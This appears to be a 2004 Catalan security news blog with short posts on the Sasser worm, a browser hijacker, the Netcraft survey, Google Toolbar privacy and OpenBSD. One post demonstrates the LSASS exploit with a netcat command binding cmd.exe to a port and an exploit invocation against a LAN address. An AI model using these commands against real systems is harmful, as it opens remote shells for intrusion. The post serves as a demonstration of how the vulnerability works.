Està circulant un rumor on es diu que tothom ha d'actualitzar a OpenSSH 3.8 el més aviat possible. Sembla que durant els propers dies (es parla que serà durant la propera setmana) hi haurà un anunci d'una important vulnerabilitat.
Per indicacions de com fer l'actualització, teniu aquest article: Guia per a la instal·lació d'OpenSSH.
|
00:00 (# Enllaç permanent) ()
|
|
|
dilluns, 3 / maig / 2004 |
[Netcraft] May 2004 Web Server Survey Finds 50 Million Sites. Per primera vegada, Netcraft ha detectat l'existència de més de cinquanta milions de servidors web (de fet, més de cinquanta milions i mig). Fa un any «només» n'hi havia quaranta milions. Fa gairebé tres anys n'hi havia trenta milions.
El software més popular continua sent, amb moltíssima diferència, l'Apache: el 67,05% o gairebé set de cada deu servidors web fan servir Apache, seguit per l'Internet Information Server de Microsoft que tot just sobrepassa el 21 per cent.
|
23:44 (# Enllaç permanent) ()
|
|
Outbreak! (cal registrar-se), un curiós vídeo interactiu de TrendMicro on es mostra les diverses proteccions que cal utilitzar dins d'una xarxa per evitar l'entrada d'alguns dels virus més populars.
|
23:39 (# Enllaç permanent) ()
|
|
[Slashdot] Mitnick Helps Bust Bomb Hoaxer explica com Kevin Mitnick ha col·laborat en la identificació a l'autor d'una sèrie d'amenaces de bombes. Les amenaces es feien a través del telèfon, però modificant el número facilitat per la funció d'identificació de trucada (Caller ID) associat a la targeta. La col·laboració de Kevin Mitnich ha permès identificar l'autor de les trucades.
|
23:15 (# Enllaç permanent) ()
|
|
Ets un autèntic hacker? Contesta les 507 preguntes d'aquest qüestionari i podràs esbrinar quin és el teu autèntic nivell, des d'un ignorant en qüestions d'informàtica fins al màxim nivell, un Wizard.
|
16:54 (# Enllaç permanent) ()
|
|
Només cal editar el fitxer /proc/sys/net/ipv4/ip_local_port_range i establir el valor apropiat.echo 61000 65095 \
> /proc/sys/net/ipv4/ip_local_port_range
Això és d'especial interès ja que permet un major control de les regles als tallafocs i pot ajudar en la tasca d'impedir la identificació del sistema operatiu.
Més informació a Linux Firewalling and Port Behavior.
|
16:45 (# Enllaç permanent) ()
|
|
Una bona prova de com funciona l'exploit de la vulnerabilitat LSASS:
A la màquina vulnerable, associem un shell a un port: d:\>nc -l -p 111 -e c:\winnt\system32\cmd.exe
A la màquina 'atacant' utilitzem l'exploit: c:\>expl 0 192.168.1.xx 111 192.168.1.yy
d:\>
El segon prompt correspon a la màquina vulnerable.
|
00:32 (# Enllaç permanent) ()
|
|
|
diumenge, 2 / maig / 2004 |
Tot just unes hores després de l'aparició del cuc de xarxa Sasser, s'ha detectat una nova variant molt similar, anomenada Sasser.B. Microsoft ha distribuït un comunicat especial avisant sobre el perill i facilitant una eina on-line de detecció i desinfecció.
Continuació...
|
19:18 (# Enllaç permanent) ()
|
|
[Wired News] Nasty Malware Fouls PCs with Porn
Last Sunday, Maria DelGiorno gave up. She unplugged her laptop PC and carefully placed it underneath a statue of the Virgin Mary.
"It was the only thing I could think of doing," said the 67-year-old great-grandmother. "The computer was filled with filthy things. It was embarrassing. My grandchildren kept asking me why I was looking at so much pornography."
On Tuesday, DelGiorno's grandson retrieved the computer and examined it. With some help from a computer-savvy friend, Joe DelGiorno discovered that a browser-hijacking program called CoolWebSearch, also known as CWS, had turned his grandmother's mild-mannered computer into a XXX-rated adventure.
(...)
Browser hijackers are malicious small programs that change browser settings, usually altering designated default start and search pages. But CWS is far uglier than other infamous browser hijackers such as Xupiter and Lop.
|
18:55 (# Enllaç permanent) ()
|
|
Aghh... alguns dels canals RSS als que fins ara estava subscrit ja comencen a enviar publicat. Per ara he estat radical en la meva resposta: he cancel·lat la meva subscripció a tots aquells que envien publicitat.
|
15:58 (# Enllaç permanent) ()
|
|
[Wireless Devcenter] Treo 600: Not Your Parents' PalmPilot és una completa anàlisi del telèfon Treo 600, un Smartphone basat en el sistema operatiu Palm OS.
 M'ha fet gràcia que ell també faci servir el telèfon com a llanterna quan camina a les fosques per casa...
|
15:56 (# Enllaç permanent) ()
|
|
En el primer trimestre de 2004 hi ha hagut més cucs (virus que es difonen per ells mateixos) en els missatges de correu electrònic que durant tot l'any passat. La raó és una competició entre els creadors de Netsky, Bagle i Mydoom, per qui infecta el major nombre d'ordinadors amb sistema operatiu Windows. Des de febrer fins avui, han aparegut desenes de noves versions d'aquests virus, que col·lapsen bústies i xarxes. Els seus creadors s'insulten entre ells, mitjançant missatges camuflats en el codi font dels cucs.
Continuació...
|
15:39 (# Enllaç permanent) ()
|
|
Sasser és un nou cuc de xarxa que aprofita un desbordament de memòria intermèdia al servei LSASS de Windows per a infectar a d'altres sistemes de forma automàtica. A diferència dels cucs convencionals que es propaguen per correu electrònic, i que esperen que un usuari executi el fitxer adjunt infectat, Sasser és capaç d'infectar els sistemes vulnerables automàticament, a l'estil del conegut Blaster, i deixa una porta secreta que permet l'entrada al sistema per part de tercers.
Continuació...
|
14:17 (# Enllaç permanent) ()
|
|
|
dissabte, 1 / maig / 2004 |
Interessant missatge d'especial interès pels usuaris que fan servidr Google Toolbar o que tenen previst fer servir Gmail, sobre questions de privadesa:
One day he had a firewall issue when trying to retrieve a file, and the person who was hosting it offered to put it on a "private" (i.e., unlinked) page for him to grab over HTTP. He accepted, downloaded the document, and promptly forgot about it - until this document, which had extremely personal information on it (personal to the person *hosting* it, not the person retrieving it) showed up on Google a short time later. You see, the toolbar had seen him go to a web page that Google did not have, and so they indexed it right away.
|
18:26 (# Enllaç permanent) ()
|
|
[Infoworld] E-mail is broken és un informe especial sobre la problemàtica del correu electrònic, els diversos intents per solucionar el problema del correu brossa i com cap d'ells ha aconseguit solucionar el problema.
|
18:16 (# Enllaç permanent) ()
|
|
Avui ha sortit la nova versió 3.5 de l'OpenBSD, una dels sistemes operatius que més seriosament es pren la seguretat. La prova: en més de 8 anys només una vulnerabilitat de seguretat explotable de forma remota a la configuració per defecte de les diferents versions del sistema operatiu.
|
17:49 (# Enllaç permanent) ()
|
|
Startup Control Panel 2.8 és una senzilla aplicació que permet controlar els programes que es carregen automàticament a Windows, en cada un dels punts on es poden trobar, tant a les diverses carpetes d'inici de programes com al registre.
|
01:16 (# Enllaç permanent) ()
|
|
[The Register] Global IT Security spend hits $42bn: avaluació de quan diners es dediquen a seguretat informàtica.
Buoyed by a tidal wave of computer viruses, security breaches, legal liability and productivity concerns, worldwide IT security spending hit $42bn in 2003. The Western European information security software market accounted for almost $2.5bn of that
Això representa menys del 5% de la despesa total en tecnologies de la informació. Segons IDC, el 2007 la seguretat representarà un 7% dels pressupostos d'informàtica.
|
00:06 (# Enllaç permanent) ()
|
|
|
O com assegurar-se que 
El 
Via 
Terrorífic: els sons d'una 
